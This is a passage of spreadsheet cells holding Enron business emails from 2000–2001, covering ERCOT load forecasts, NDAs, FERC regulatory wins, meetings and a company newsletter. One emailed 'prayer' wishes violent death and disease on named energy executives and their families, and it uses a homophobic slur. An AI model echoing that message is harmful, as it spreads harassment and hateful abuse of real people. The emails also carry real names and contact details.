The zonal load forecasts are being generated using data from the ten old control areas.  I generate a load forecast for each of the old control areas and then portion out the loads in the appropriate amounts to each of the zones.  The reason I am generating a load forecast for each of the old control areas is for future use in the PowerWorld model.  I have load data through 12/31/2000 for each of these areas.  Each of the models is estimated from 7/1/1998 through 12/31/2000.  Since ERCOT is not publishing actual zonal loads at this time (let me know if that assumption is not correct), we are currently lagging nearly eight months of data and, obviously, this gap will continue to grow.  For these reasons, as well as the ones you are already aware of, East Power's forecasts of ERCOT's zonal loads could differ from the ISO's forecasts._x000D_
_x000D_
The zonal load forecasts are in the following location:_x000D_
_x000D_
m:\electric\metrixnd\daily forecasts\first forecast\ERCOT Regional Load.xls (with tabs for each of the regions)_x000D_
_x000D_
_x000D_
I will continue to publish a separate total ERCOT load forecast, the model of which is estimated from 1/1/1999 through 8/13/2001 (always containing the most current load data available).  The total ERCOT load forecast will differ from the sum of the zonal load forecasts due to the different estimation periods and the use of separate models.  A comparison between the ERCOT total load forecast and the sum of the zonal load forecasts shows that they are reasonably close.  You are welcome to do your own comparisons._x000D_
_x000D_
Let me know if you have any questions or comments.</t>
  </si>
  <si>
    <t>Fri, 28 Jul 2000 05:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>bond website</t>
  </si>
  <si>
    <t>http://www.bondsonline.com/</t>
  </si>
  <si>
    <t>Wed, 21 Feb 2001 06:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jserio@nicor.com'})</t>
  </si>
  <si>
    <t>Re: GISB and Special Provisions</t>
  </si>
  <si>
    <t>This looks fine.  However,  I wanted to let you know  we do not  sign the _x000D_
Appendix as it is incorporated into the agreement.  I will print and send to _x000D_
your for execution._x000D_
_x000D_
_x000D_
Regards,_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490</t>
  </si>
  <si>
    <t>Tue, 21 Nov 2000 07:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'gillian.johnson@enron.com'})</t>
  </si>
  <si>
    <t>Re: I2 NDA</t>
  </si>
  <si>
    <t xml:space="preserve">Richard Sage is coordinating the initialing and signing for us which is why I _x000D_
included him on the replies.  We will not be meeting with them in person _x000D_
tomorrow, but will be discussing the relationship and the documents that we _x000D_
will be sending.  They have changed the appropriate contact person so we will _x000D_
be determining who the new person should be during the call._x000D_
_x000D_
Thanks._x000D_
_x000D_
Gillian_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Leslie Hansen@ECT_x000D_
11/21/2000 02:29 PM_x000D_
To: Gillian Johnson/NA/Enron@ENRON_x000D_
cc: Tana Jones/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: I2 NDA  _x000D_
_x000D_
I understand that this will be executed in London.  Is there a lawyer who _x000D_
will initial the NDA for EnronCredit in connection with our execution?  I'm _x000D_
assuming you will have this NDA executed prior to the meeting._x000D_
_x000D_
Leslie_x000D_
_x000D_
_x000D_
_x000D_
	Gillian Johnson@ENRON_x000D_
	11/21/2000 01:32 PM_x000D_
		_x000D_
		 To: Leslie Hansen/HOU/ECT@ECT_x000D_
		 cc: Craig Chaney/HOU/ECT@ECT, Richard Sage/LON/ECT@ECT_x000D_
		 Subject: Re: I2 NDA_x000D_
_x000D_
Thanks for taking care of this.  We will be meeting with them tomorrow._x000D_
_x000D_
Gillian_x000D_
_x000D_
_x000D_
_x000D_
Leslie Hansen@ECT_x000D_
11/21/2000 12:56 PM_x000D_
To: Gillian Johnson/NA/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: I2 NDA_x000D_
_x000D_
Gillian:_x000D_
_x000D_
Attached please find the I2 NDA as revised to provide that the term of the _x000D_
NDA is 3 years and that Confidential Information disclosed under the _x000D_
agreement is protected for 2 years after the date of the disclosure._x000D_
_x000D_
I can finalize for execution after I2 has approved the contents of this NDA.  _x000D_
I'll leave it to you to distribute to them._x000D_
_x000D_
Leslie_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2000 06:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: SITA</t>
  </si>
  <si>
    <t xml:space="preserve">I believe we are just waiting to resolve the guaranty issues.  Is there _x000D_
anything I need to do at this time?_x000D_
_x000D_
_x000D_
From: Sara Shackleton@ECT on 11/16/2000 01:26 PM_x000D_
To: Stephanie Panus/NA/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: SITA_x000D_
_x000D_
Matt Dawson in London was inquiring about this agreement.  He'll want to know _x000D_
when we are finished because he has a London paper trader nagging him.  SS_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 5 Apr 2000 06:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Joe's group accomplishments in 2000 SO FAR!!</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
---------------------- Forwarded by Richard Shapiro/HOU/EES on 04/05/2000=_x000D_
=20_x000D_
01:50 PM ---------------------------_x000D_
From: Christi L Nicolay@ECT on 04/05/2000 01:49 PM_x000D_
To: James D Steffes/HOU/EES@EES, Richard Shapiro/HOU/EES@EES_x000D_
cc: Joe Hartsoe/Corp/Enron@Enron, Sarah Novosel/Corp/Enron@Enron, Charles=_x000D_
=20_x000D_
Yeung/HOU/ECT@ECT, Richard Ingersoll/HOU/ECT@ECT=20_x000D_
Subject: Joe's group accomplishments in 2000 SO FAR!!_x000D_
_x000D_
Per Jim's request for the database.  (I don't know if you want to put the=_x000D_
=20_x000D_
values that Kevin is giving into the database). =20_x000D_
_x000D_
 (1)  Completed the negotiations and FERC filing of the Next Hour Market=20_x000D_
scheduling proposal.  When implemented, scheduled for June 2000, this will=_x000D_
=20_x000D_
provide one stop shopping for next hour business.  Ties OASIS and TAGGING=_x000D_
=20_x000D_
together into one request.  Also if a tranmission provider cuts the=20_x000D_
transmission the PSE only pays for his actual use versus what he originally=_x000D_
=20_x000D_
scheduled. This will speed up the ability to schedule the next hour=20_x000D_
non-firm.  This order is an important recognition by FERC that its OATT did=_x000D_
=20_x000D_
not cover hourly, which we complained about alot at FERC's hotline last=20_x000D_
summer._x000D_
_x000D_
 2)  Successful in obtaining the release of all ISN (system information) to=_x000D_
=20_x000D_
marketers in the WSCC region.  This was an individual effort by Dick that h=_x000D_
as=20_x000D_
been benificial for our traders in the WEST.  Successfully prevented the WS=_x000D_
CC=20_x000D_
Operating Committee from taking action that would have reversed this effort=_x000D_
. =20_x000D_
_x000D_
 3)  Assisted in getting the initial control areas in SERC approved last ye=_x000D_
ar=20_x000D_
and preventing ATC changes this year and OC changes that would have negated=_x000D_
=20_x000D_
the Control Area effort._x000D_
_x000D_
 4)  Dick served as Co CHAIR of the ISO committee that put the SPP contract=_x000D_
=20_x000D_
in place that eliminated MW mile pricing in SPP and will serve as the basis=_x000D_
=20_x000D_
for SPP's RTO.  =20_x000D_
_x000D_
 5) Dick was appointed to the NERC Control Area Task Force which was formed=_x000D_
=20_x000D_
as a result of our the success of the Enron Control Areas in TVA and have s=_x000D_
o=20_x000D_
far been successful in keeping this effort so that it is non punitive.  Thi=_x000D_
s=20_x000D_
has turned into a very positive process that may result in a new=20_x000D_
configuration of the NERC relibiability effort._x000D_
_x000D_
 (6) Dick's made comments to ENTERGY that helped push Entergy into filing=_x000D_
=20_x000D_
their new scheduling procedure (ultimate source and sink) with FERC.  This=_x000D_
=20_x000D_
was initially going to be implemented unilaterally March 1 without a FERC=_x000D_
=20_x000D_
filing and Enron would have been forced into an after the fact complaint=20_x000D_
situation at FERC where we are not allowed to get damages that we would hav=_x000D_
e=20_x000D_
incurred in the meantime (See Comm. Massey's concurrence in Aquila v. Enter=_x000D_
gy=20_x000D_
about the lack of incentive to file complaints).  Kevin Presto said that=20_x000D_
winning the protest at FERC (due 4/12) would be worth $100 MM._x000D_
_x000D_
 (7)  On 2/2, TECO revised its proposed generator imbalance charge from=20_x000D_
minute by minute to hourly accountability (notably, TECO revised its propos=_x000D_
al=20_x000D_
before FERC issued an order based on the EPSA protest herein.) We worked wi=_x000D_
th=20_x000D_
EPSA to file an EPSA protest to TECO=01,s proposal.  We didn=01,t like TECO=_x000D_
's=20_x000D_
proposal but had commercial concerns about filing a protest in our own name=_x000D_
=20_x000D_
(since Enron is working with TECO on a project).   We were able to get EPSA=_x000D_
=20_x000D_
to protest this issue in TECO's initial filing.  Enron is planning to site=_x000D_
=20_x000D_
generation in Florida, but we don't have the value on this win yet._x000D_
_x000D_
             (8)  FERC issued a NOPR on January 28 proposing to revise the=_x000D_
=20_x000D_
way it assesses annual charges to public utilities.  Enron, along with=20_x000D_
several other participants (Dynegy, Koch, APX, Citizens, NP Energy, Sonat a=_x000D_
nd=20_x000D_
Williams), filed a petition for rulemaking with FERC in August, 1998,=20_x000D_
requesting FERC to revise its methodology for assessing annual charges,=20_x000D_
arguing that FERC's current system of assessing annual charges on sales for=_x000D_
=20_x000D_
resale of power discourages trading, impedes reliance on competitive market=_x000D_
s=20_x000D_
for power, and could create competitive advantages for utilities over new=_x000D_
=20_x000D_
power marketers entering the market.  We proposed that FERC either assess i=_x000D_
ts=20_x000D_
costs on transmission only, or reallocate the amounts that it collects=20_x000D_
through sales transactions versus transmission transactions.  Although FERC=_x000D_
=20_x000D_
does not grant our petition and in fact dismisses it as moot, the petition=_x000D_
=20_x000D_
served its purpose._x000D_
_x000D_
In the NOPR, FERC notes that because most of its time is spent on=20_x000D_
transmission issues (a point that we made in the Petition), it is appropria=_x000D_
te=20_x000D_
to assess costs only on the MWh of electric energy transmitted in interstat=_x000D_
e=20_x000D_
commerce by public utilities.  Under the current assessment system, FERC=20_x000D_
divides its costs between transmission and sales.  Now FERC is proposing to=_x000D_
=20_x000D_
collect its costs solely through transmission.  FERC justifies this change=_x000D_
=20_x000D_
because it spends most of its time on transmission issues, and because=20_x000D_
transmission providers can collect the fees through transmission charges=20_x000D_
assessed to users of the grid.  FERC proposes to asses its costs to 1)=20_x000D_
unbundled wholesale transmission; 2) unbundled retail transmission; and 3)=_x000D_
=20_x000D_
bundled wholesale power sales.  Bundled native load transactions will=20_x000D_
apparently avoid assessments of any FERC-related costs; however, EPSA and=_x000D_
=20_x000D_
Enron are protesting this issue at FERC.  (Jim Steffes has been working on =_x000D_
a=20_x000D_
calculation of additional value.)_x000D_
_x000D_
 (9)  Interconnection Policy =01) Utilizing EPSA efforts, including Sarah's=_x000D_
=20_x000D_
meeting with FERC, we got the policy statement we urged FERC to put forth (=_x000D_
in=20_x000D_
the forum we suggested, i.e., an existing proceeding) in the Tennessee Powe=_x000D_
r=20_x000D_
order where FERC said interconnection procedures should follow the pro form=_x000D_
a=20_x000D_
tariff, including that a generator doesn't have to request transmission and=_x000D_
=20_x000D_
interconnection at the same time.  We worked with EPSA to draft the "Model"=_x000D_
=20_x000D_
interconnection agreement that EPSA filed at FERC in the Entergy=20_x000D_
interconnection proposal._x000D_
_x000D_
 (10)  AEP/CSW order =01) approved the merger but accepted intervenors=01,=_x000D_
=20_x000D_
testimony showing market power and conditioned merger on an independent=20_x000D_
calculation of ATC postings (which we proposed) and independent market=20_x000D_
monitor soon after the merger occurs with RTO participation by 12/15/01. =_x000D_
=20_x000D_
Kevin Presto said the independent ATC calculation is worth $20 MM to Enron.=_x000D_
 =20_x000D_
(Note: we are going to propose MAIN instead of SPP, which AEP chose.).  Kev=_x000D_
in=20_x000D_
said that AEP's ATC calculation can trump all interfaces in ECAR, so this h=_x000D_
as=20_x000D_
a positive effect not just on AEP, but on all of ECAR._x000D_
_x000D_
 (11) MAPP =01) FERC further order on refunds.  MAPP refused to refund moni=_x000D_
es=20_x000D_
that it was unable to collect from a non-jurisdictional member transmission=_x000D_
=20_x000D_
owner, NPPD.  EPMI filed a protest to MAPP=01,s refund report, arguing that=_x000D_
 MAPP=20_x000D_
was ordered to make full refunds and it violated that order.  FERC agreed=_x000D_
=20_x000D_
with Enron and rejected MAPP=01,s refund report.  FERC said MAPP must refun=_x000D_
d the=20_x000D_
full amount to transmission customers, whether or not it was able to collec=_x000D_
t=20_x000D_
that money from NPPD.  Results in another $50,000 of refunds for EPMI._x000D_
_x000D_
 (12)  Sarah is working on the PGE sale._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 2 Aug 2001 07:47:28 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ben.hill@enron.com'})</t>
  </si>
  <si>
    <t>Moving Ercot Lines, etc.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Ben, as discussed,  please move the four Ercot lines to the front page for the listed people below.       Also,  to the extent possible,   add the E lines._x000D_
_x000D_
These guys are prioritized as follows:_x000D_
_x000D_
John Forney_x000D_
Eric Saibi_x000D_
Steve Olinde_x000D_
Joe Capasso (new to group)_x000D_
Alex McElreath_x000D_
Jeff Miller_x000D_
Smith Day_x000D_
Joe Errigo_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 16:50:48 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'wes.colwell@enron.com', 'tammie.schoppe@enron.com', 'kimberly.hillis@enron.com', 'rich.dimichele@enron.com', 'marisa.rapacioli@enron.com', 'london.brown@enron.com', 'cathy.phillips@enron.com', 'jeffrey.mcmahon@enron.com', 'stanley.horton@enron.com', 'richard.causey@enron.com', 'crissy.collett@enron.com', 'faith.killen@enron.com', 'louise.kitchen@enron.com', 'shirley.tijerina@enron.com', 'greg.piper@enron.com', 'sue.ford@enron.com', 'liz.taylor@enron.com', 'w..delainey@enron.com', 'mike.mcconnell@enron.com', 'kay.chapman@enron.com', 'connie.blackwood@enron.com', 'john.sherriff@enron.com', 'sharron.westbrook@enron.com', 'lucy.marshall@enron.com', 'john.lavorato@enron.com', 'kerry.ferrari@enron.com', 'jim.fallon@enron.com', 'a..hughes@enron.com', 'tina.spiller@enron.com', 'cindy.stark@enron.com'})</t>
  </si>
  <si>
    <t>Whalley Budget Meeting - Tuesday, November 27 @ 11:00 a.m. in ECN_x000D_
 32C2</t>
  </si>
  <si>
    <t xml:space="preserve">There will be a budget meeting on Tuesday, November 27 @ 11:00 a.m. in ECN 32C2.  London will participate via video conference (NE5003).  Please notify me if you are unable to attend._x000D_
_x000D_
Many Thanks,_x000D_
_x000D_
Liz Taylor_x000D_
Executive Assistant to_x000D_
Greg Whalley, President &amp; COO_x000D_
Enron Corp._x000D_
liz.taylor@enron.com_x000D_
</t>
  </si>
  <si>
    <t>Thu, 26 Jul 2001 02:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: CA Instrate Gas matters</t>
  </si>
  <si>
    <t xml:space="preserve">While Leslie was out I had a brief discussion with Tycholiz, et al.  They're _x000D_
going to pull together an outline of the things they're thinking about and _x000D_
get back to us on it for discussion._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
	Susan M Landwehr/ENRON@enronXgate_x000D_
	07/25/2001 09:57 PM_x000D_
		 _x000D_
		 To: Leslie Lawner/ENRON@enronXgate_x000D_
		 cc: Jeff Dasovich/NA/Enron@Enron_x000D_
		 Subject: RE: CA Instrate Gas matters_x000D_
_x000D_
_x000D_
Leslie--I don't know whatever happened to this discussion?  I suggested to _x000D_
Jeff that I would be available off and on during the week, but I think he was _x000D_
nuts with the legislative session.  SHould we try again or have you already _x000D_
discussed?_x000D_
 -----Original Message-----_x000D_
From:  Leslie Lawner  _x000D_
Sent: Friday, July 13, 2001 6:30 PM_x000D_
To: Barry Tycholiz_x000D_
Cc: Jeff Dasovich; Susan M Landwehr_x000D_
Subject: RE: CA Instrate Gas matters_x000D_
_x000D_
I am really only available Monday am (I am on a well-deserved vacation next _x000D_
week), but if that works for you, that would be great.  Jeff is pretty full _x000D_
up with the CA legislature and all the electric stuff.  We can try him, tho.  _x000D_
What I would like is to come up with a coherent message on hedging in CA, _x000D_
particularly the core-non-core issues, so that at the end of the day, EES _x000D_
still has a market and ENA can sell hedges to the LDCs.  Sue Landwehr in Gov _x000D_
Affairs is the leader/coordinator of our hedging activities before the state _x000D_
commissions and we should get her involved as well.  In fact I will cc both _x000D_
Sue and Jeff on this._x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Tycholiz, Barry  _x000D_
Sent: Friday, July 13, 2001 12:52 PM_x000D_
To: Lawner, Leslie_x000D_
Subject: RE: CA Instrate Gas matters_x000D_
_x000D_
leslie, I would like to talk to you and jeff regarding ENA's plans to talking _x000D_
to the PUC regarding hedging activities... let's do this early next week.  Is _x000D_
there a time that is best to schedule. _x000D_
_x000D_
BT _x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Lawner, Leslie  _x000D_
Sent: Friday, July 13, 2001 8:21 AM_x000D_
To: Allen, Phillip K.; Kingerski, Harry; Kaufman, Paul; Tycholiz, Barry; _x000D_
Miller, Stephanie; Ponce, Roger; Black, Don; Hewitt, Jess; Shireman, _x000D_
Kristann; Courtney, Mark; Elliott, Chris; Dasovich, Jeff; Becky McCabe; _x000D_
Fulton, Donna; Steffes, Darla; Stoness, Scott; Johnson, Tamara_x000D_
Cc: Nicolay, Christi_x000D_
Subject: CA Instrate Gas matters_x000D_
_x000D_
This is to quickly summarize our call on July 11 on California gas intrastate _x000D_
matters and set a direction for future activity._x000D_
_x000D_
Unbundling:  PG&amp;E has a Gas Accord in effect through 12/31/03, which is _x000D_
generally positive.  We will participate in the development of a successor _x000D_
plan, and attempt to improve it if we can._x000D_
    SoCalGas attempted its own version of a gas accord, but the CPUC refused _x000D_
to approve.  We will attempt to resurrect this accord and obtain CPUC _x000D_
approval. _x000D_
_x000D_
Hedging:  No proceeding currently exists to address gas hedging by LDCs.  _x000D_
(draft legislation does exist on the electric side to allow hedging and _x000D_
passthrough of costs).  Jeff has recommended that we approach the LDCs to _x000D_
begin discussing the issue and developing a strategy to take to the CPUC.  I _x000D_
suggest we develop an ENA-EES hedging proposal for CA and then take that to _x000D_
the LDCs.  I will attempt to put this is writing._x000D_
_x000D_
Infrastructure:  CPUC has undertaken a proceeding to determine the need to _x000D_
improve infrastructure.  SoCal Gas and PG&amp;E are responding with proposals.  _x000D_
We want to revitalize the infrastructure and ensure real markets exist and _x000D_
can develop.  Our task is to participate in these proceedings._x000D_
_x000D_
(Please let me know who I left off the mailing list)._x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Jun 2001 22:05:43 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mlpdgrace@yahoo.com'})</t>
  </si>
  <si>
    <t>frozenset({'bruce.connery@elpaso.com', 'investduk@duke-energy.com', 'bridget.mcevoy@elpaso.com', 'klay@enron.com', 'richard.cockrell@elpaso.com'})</t>
  </si>
  <si>
    <t>A PRAYER FOR THE FALL AND DESTRUCTION OF CEOS AT  ENRON, ELPASO AND_x000D_
 DUKE</t>
  </si>
  <si>
    <t xml:space="preserve">  ALMIGHTY AND EVER LIVING GOD MAY THE HEDIOUS CEOS OF_x000D_
ENRON, ELPASO AND DUKE DIE OF CANCER, MAY THEIR_x000D_
FAMILIES BE CURSED FOREVER WITH THE PLAGUE, MAY YOU_x000D_
STRIKE THEM WITH ELECTRICAL SHOCK SO THEY ARE INFIRM_x000D_
AND SUFFER MISERABLE DEATHS.  MAY THEIR CORPORATE JETS_x000D_
RUN OUT OF FUEL, CRASHING AND LIVING THEM WITHOUT_x000D_
LIMBS, MAY THEIR SKIN BE EXPOSED TO CANCER, MAY THEY_x000D_
BREATHE SMOG FOR ETERNITY, MAY THEY CHOKE TO DEATH THE_x000D_
NEXT TIME THEY EAT A BIG MAC SINCE THEY ARE ALL BIG_x000D_
FAT WHITE MEN.  MAY THEIR EYES FALL OUT.  MAY_x000D_
GENERATIONS OF CEOS AND THEIR OFFSPRING HAVE_x000D_
HORRENDOUS DISEASES.  ALL OF THIS IN CHRIST'S NAME_x000D_
THAT CEOS OF THESE COMPANIES MAY BE JUDGED FOR AN_x000D_
ETERNITY OF FILTHY SUFFERING IN HELL.  MAY THEIR_x000D_
MISTRESSES GIVE THEM AIDS. MAY THEY BE CURSED FOR THE_x000D_
CRIMES THEY ARE COMMITTING AGAINST HUMANITY INCLUDING_x000D_
THAT IDIOT FROM TEXAS WHO WILL BE KNOWN AS A ONE TERM_x000D_
PRESIDENT LIKE HIS HORRIBLE FATHER.  AS FOR THE FAT_x000D_
VICE PRESIDENT, MAY HIS WIFE TURN INTO A BIG DYKE LIKE_x000D_
HE'S DAUGHTER. IN THE NAME OF THE GREAT 666, MAY THE_x000D_
DEVIL OPEN HIS HEART TO CURSE ALL OF THE CEOS AND_x000D_
THEIR FAMILIES IN CHRIST'S NAME._x000D_
AMEN_x000D_
PRAYED NIGHTLY BY THE PEOPLE OF CALIFORNIA_x000D_
_x000D_
___________________________________________________x000D_
Do You Yahoo!?_x000D_
Get personalized email addresses from Yahoo! Mail - only $35_x000D_
a year!  http://personal.mail.yahoo.com/</t>
  </si>
  <si>
    <t>Tue, 7 Nov 2000 02:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Kansas</t>
  </si>
  <si>
    <t>The kids and I are arriving at 9:45am on Thursday.  Because of work _x000D_
commitments, Kristi is arriving at 12:30pm.  The 3 of us will get a rental _x000D_
car and make our way to your place.  Are you going to be home then?  Then we _x000D_
will go pick up Kristi later.  We have no plans at the moment (other than _x000D_
going to the game on Saturday).  We are leaving on Sunday at an awful time, _x000D_
though, 6:30am.  They didn't give me many options using reward travel.  We _x000D_
are all looking forward to the trip.  See you on Thursday._x000D_
_x000D_
DG</t>
  </si>
  <si>
    <t xml:space="preserve">Slow browser may need to wait 15 seconds for your email to appear, then scroll to view. mailto:leave-enerfaxdaily-801048M@relay.netatlantic.com to unsubscribe enerfaxdaily as: stanley.horton@enron.com forward to web@enerfax.com _x000D_
If your email does not support this web version, please subscribe to the free text version by writing subscribe@enerfax.com Please visit our website to view today's gas and power prices and news by clicking http://www.enerfax.com_x000D_
 </t>
  </si>
  <si>
    <t>Thu, 17 May 2001 15:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>BUSINESS HIGHLIGHTS_x000D_
_x000D_
Enron Industrial Markets_x000D_
Enron Industrial Markets announced the signing of definitive agreements wit=_x000D_
h=20_x000D_
Huntco, Inc. under which over a 15-year period Enron will provide inventory=_x000D_
=20_x000D_
price risk management services and will eventually provide more than 600,00=_x000D_
0=20_x000D_
tons per year of hot-rolled, cold-rolled and galvanized steel products to=_x000D_
=20_x000D_
Huntco Steel.  The agreements provide Enron access to Huntco=01,s network o=_x000D_
f=20_x000D_
steel distribution centers nationwide.  The agreements also provide for Enr=_x000D_
on=01,_x000D_
s acquisition of Huntco=01,s cold rolling and certain coil pickling operati=_x000D_
ons=20_x000D_
in Blytheville, Arkansas._x000D_
_x000D_
These transactions with Huntco have the potential to fundamentally change t=_x000D_
he=20_x000D_
way steel is bought and sold in the United States.  It gives Enron immediat=_x000D_
e=20_x000D_
access to physical steel and positions Enron geographically to serve the=20_x000D_
steel industry in a variety of ways.  In addition to providing physical=20_x000D_
products on both a spot and term basis, EIM=01,s goals for the steel indust=_x000D_
ry=20_x000D_
include developing commodity risk management products, providing structured=_x000D_
=20_x000D_
finance products and establishing the market-making capabilities that Enron=_x000D_
=20_x000D_
has brought to the natural gas, power and other commodity markets._x000D_
_x000D_
Enron North America-Upstream Products_x000D_
Upstream Products has partnered with Duke Energy Field Services (DEFS) to=_x000D_
=20_x000D_
close a 20-year NGL exchange and transportation deal with Formosa=20_x000D_
Hydrocarbons and Williams Energy Field Services to handle raw make product=_x000D_
=20_x000D_
from the Williams Markham plant. Formosa Hydrocarbons is building a 40,000=_x000D_
=20_x000D_
BPD fractionator to handle this and other Gulf Coast NGL production.  The=_x000D_
=20_x000D_
accompanying pipeline will be known as the Seabreeze pipeline system and wi=_x000D_
ll=20_x000D_
be constructed by DEFS. Texas Brine LLC will provide NGL storage services f=_x000D_
or=20_x000D_
Formosa Hydrocarbons on this system. Primary production for this system is=_x000D_
=20_x000D_
coming from the Boomvang Nansen field in the deepwater GOM and will be the=_x000D_
=20_x000D_
first deepwater GOM production to come onshore in Texas.=20_x000D_
Upstream Products has also worked to arrange a 20-year transportation lease=_x000D_
=20_x000D_
agreement on the Dean Pipeline (owned by TEPPCO) for refinery grade propyle=_x000D_
ne=20_x000D_
service to be utilized by Formosa Plastics. Coupled with this transaction,=_x000D_
=20_x000D_
Enron Clean Fuels has entered into a propylene storage agreement with Formo=_x000D_
sa=20_x000D_
Plastics to utilize ECF=01,s Mt. Belvieu storage facilities.  In addition, =_x000D_
Enron=20_x000D_
Global Markets has been able to amend its current transportation agreement=_x000D_
=20_x000D_
with TEPPCO to prematurely terminate a take-or-pay obligation and realize=_x000D_
=20_x000D_
additional transportation revenues from interim NGL production coming from=_x000D_
=20_x000D_
the Williams Markham to be delivered to Mt. Belvieu. =20_x000D_
Upon close, Upstream Products was monetized out of its initial position by=_x000D_
=20_x000D_
DEFS and retained a risk-free net profits position on the Seabreeze Pipelin=_x000D_
e=20_x000D_
going forward for an additional 20,000-40,000 BPD of excess capacity on the=_x000D_
=20_x000D_
system._x000D_
ENA West Power_x000D_
Southwest Power, an ENA affiliate, signed a 222MW 15-year tolling agreement=_x000D_
=20_x000D_
with Allegheny Energy Supply for all of the output of Southwest's Las Vegas=_x000D_
=20_x000D_
expansion project, scheduled for completion in September, 2002.  With the=_x000D_
=20_x000D_
tolling agreement done and construction underway, the project will now be=_x000D_
=20_x000D_
marketed to qualified generators._x000D_
_x000D_
IN THE NEWS_x000D_
_x000D_
=01&amp;To truly understand Enron=01,s Jeffrey Skilling =01) the hypersmart,=20_x000D_
hyperconfident chief executive of what may now be the largest energy tradin=_x000D_
g=20_x000D_
company on the planet =01) head to your local video store and check out tha=_x000D_
t=20_x000D_
classic American cinema, Wayne=01,s World.  At 15, Skilling helped launch a=_x000D_
=20_x000D_
no-budget television station in Aurora, Illinois =01) the very thing that M=_x000D_
ike=20_x000D_
Myers and Dana Carvey so famously spoofed on Saturday Night Live and in two=_x000D_
=20_x000D_
movies.  The TV skit even begins with a sketch of a teenage cameraman, the=_x000D_
=20_x000D_
role of the real-life Skilling.=018 =01)-- Randall Lane, Worth Magazine. Ma=_x000D_
y 2001._x000D_
_x000D_
Calgary, Alberta -- Enron Canada has settled its lawsuit with NGX, Canadian=_x000D_
=20_x000D_
Enerdata, OM Gruppen and Richard Zarzeczny, regarding the compilation and=_x000D_
=20_x000D_
methodology for calculating the Alberta natural gas price indices published=_x000D_
=20_x000D_
by the Canadian Gas Price Reporter.  By the terms of the settlement there=_x000D_
=20_x000D_
will be a joint press release issued regarding the settlement, which is to =_x000D_
be=20_x000D_
the only public communication regarding the matter unless agreed to by all=_x000D_
=20_x000D_
parties. Otherwise the settlement is confidential to the parties. =20_x000D_
Accordingly, there is to be no formal or informal discussion with media,=20_x000D_
colleagues, competitors, counterparties or otherwise._x000D_
_x000D_
WELCOME_x000D_
New Hires_x000D_
EGM  - Salil Pradhan, Randy O=01,Conner, Ricardo Charvel, Greg Fields, Ken=_x000D_
=20_x000D_
Newman, John Ashman, Rick Cantrell, Tim Klaiber, Trevor Woods,=20_x000D_
EIM   - Tim Asterman, Maxine Leclaire, Jerry Newton, Philip Siewert, Janamo=_x000D_
n=20_x000D_
Johnson, Darralyn Briskey, Theodore Rogers,=20_x000D_
ENA  - Rae Meadows, Tiffany Winship, Adrianne Engler, Kimberly Yates, Jacki=_x000D_
e=20_x000D_
Verity,_x000D_
_x000D_
Transfers (to or within)_x000D_
ENA =01)Christa Winfrey, Mario Alonso, Paul Rizo-Patron, Nick Ploitis, Mist=_x000D_
i=20_x000D_
Day, Robert Cothran, Susan Wilson, Diane Cutsforth, David Owen_x000D_
EGM =01) Mark Friedman, John Groves, Deirdre McCaffrey, William Windle_x000D_
_x000D_
EnronOnline Statistics_x000D_
_x000D_
Below are the latest figures for EnronOnline as of May 9, 2001._x000D_
_x000D_
* Total Life to Date Transactions &gt; 963,575_x000D_
* Life to Date Notional Value of Transactions &gt; $579 billion_x000D_
_x000D_
_x000D_
NUGGETS &amp; NOTES_x000D_
_x000D_
Reminder:  Brown Bag Lunch, Thursday, May 17 at 11:30 AM in 5 C2. The speak=_x000D_
er=20_x000D_
is Michael L. Miller discussing Principal Investments._x000D_
_x000D_
=01&amp;Historically, Newsprint has been sold under strong relationships as a h=_x000D_
ighly=20_x000D_
differentiated, branded product to =01&amp;very discriminating=018 buyers at ne=_x000D_
wspaper=20_x000D_
publishers. EIM believed differently.  By the end of March, EIM had succeed=_x000D_
ed=20_x000D_
in closing on its 2nd Newsprint mill, making it the 7th largest Newsprint=_x000D_
=20_x000D_
manufacturer in North America.  Remarkably, in just 2 months, EIM=01,s News=_x000D_
print=20_x000D_
team has succeeded in closing $100MM total notional value =01&amp;Enron commodi=_x000D_
ty=20_x000D_
style=018 fixed price contracts with terms of 1 to 5 years=01(..and they sa=_x000D_
id it=20_x000D_
wasn=01,t a commodity.=018_x000D_
Rodney Malcolm =01) Vice President, Forest Products Sales and Marketing_x000D_
_x000D_
Travel Tip of the Week:  Book flights 7 days in advance.  The cost savings=_x000D_
=20_x000D_
can be considerable if you plan ahead =01) at least 7 days._x000D_
 For example:  Houston to Portland_x000D_
       Less than 7 days:  $ 1,652_x000D_
       7 day advance ticketing $    324_x000D_
_x000D_
_x000D_
Congratulations to Kimberly and Eric Thode, director of ENA Public=20_x000D_
Relations.  They are the proud parents of Whitney Marie, born on May 3.  Sh=_x000D_
e=20_x000D_
weighed 8 lbs. 8 oz._x000D_
_x000D_
